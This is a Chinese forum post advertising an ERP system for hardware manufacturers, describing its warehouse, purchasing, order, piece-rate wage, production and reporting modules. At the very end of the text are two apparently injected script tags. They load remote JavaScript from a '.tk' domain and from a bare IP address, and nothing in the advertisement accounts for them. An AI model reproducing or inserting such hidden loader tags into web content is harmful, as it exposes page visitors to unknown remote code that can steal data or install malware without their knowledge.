你在这里

亿德五金ERP,唯一专注五金制品行业的ERP提供商 020-87577468

1 post / 0 new
read article 广州亿德科技
亿德五金ERP,唯一专注五金制品行业的ERP提供商 020-87577468

[B][SIZE=5]亿德五金ERP,唯一专注五金制品行业的ERP提供商

更详细的资料请登录[url]www.easydayit.com或来电咨询:020-87577468[/url][/SIZE][/B]

系统管理模块
本模块中包括用户权限管理、密码管理、系统日志、数据的备份和恢复、公司显示信息、系统其他参数的设定。

仓库管理模块
用来控制仓库物料的数量,以保证稳定的物流支持正常的生产,系统的功能模块包含内容:
为所有的物料建立库存,决定何时定货采购,同时作为交与采购部门采购、生产部门作生产计划的依据;
收到订购物料后,经过质量检验入库,生产的产品也同样要经过检验入库;
平时物料出入库的日常业务处理工作;

订单管理模块
客户生产订单、供应商的采购单、采购合同单据管理

采购管理模块
确定合理的定货量、优秀的供应商和保持最佳的安全储备。能够随时提供定购、验收的信息,跟踪和催促对外购或委外加工的物料,保证货物及时到达。建立供应商的档案,用最新的成本信息来调整库存的成本。

基本信息维护模块
包含人员、部门、来往单位、工序等等基本信息的维护。

人事工资管理模块
产品生产中,工件在生产过程的流动中,系统都将记录完整的生产数据信息,而相应的计件工资也将非常简单的可以计算和查询,主要包括:
正品工资
废品扣罚
次品扣罚
丢失扣罚
杂工工资、返处理工资、其他工资

产品配方控制模块
所有订单的产品都有包含半成品、零部件、五金件等配件,同时配件所需进行的工序配制,以及各工序的计件单价、扣罚单价、班组信息等等,都是在配方设置模块中进行。

耗料设置模块
不同产品中不同零, 件或者半成品所耗去的原材料、五金件、包装材料等信息。

生产管理模块
为整个系统的核心,它将企业的整个生产过程中的所有最细的工序有机结合在一起,使得企业能够有效的降低库存,减少耗费,提高效率。同时各个原本分散的生产流程的自动连接,也使得生产流程能够前后连贯的进行,而不会出现生产脱节从而耽误生产和交货时间。生产控制管理是一个以计划为导向的先进的生产管理方法。首先,企业确定它的一个总生产计划,再经过系统细分后,下达到各部门、各班组去执行。即生产部门以此生产,采购部门按此采购等等。
包含有:
生产计划;
物料计划;
控制生产;
能力控制;
质量工资;
所有工序的详细生产数据控制:

综合查询分析报表模块
查询模块涵盖了企业运行的所有要素。包括生产控制、采购、产品销售、人事工资、仓库管理、生产计划、成本核算、完成情况等综合信息。为企业领导制定正确发展战略做出果断决策提供科学依据。<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>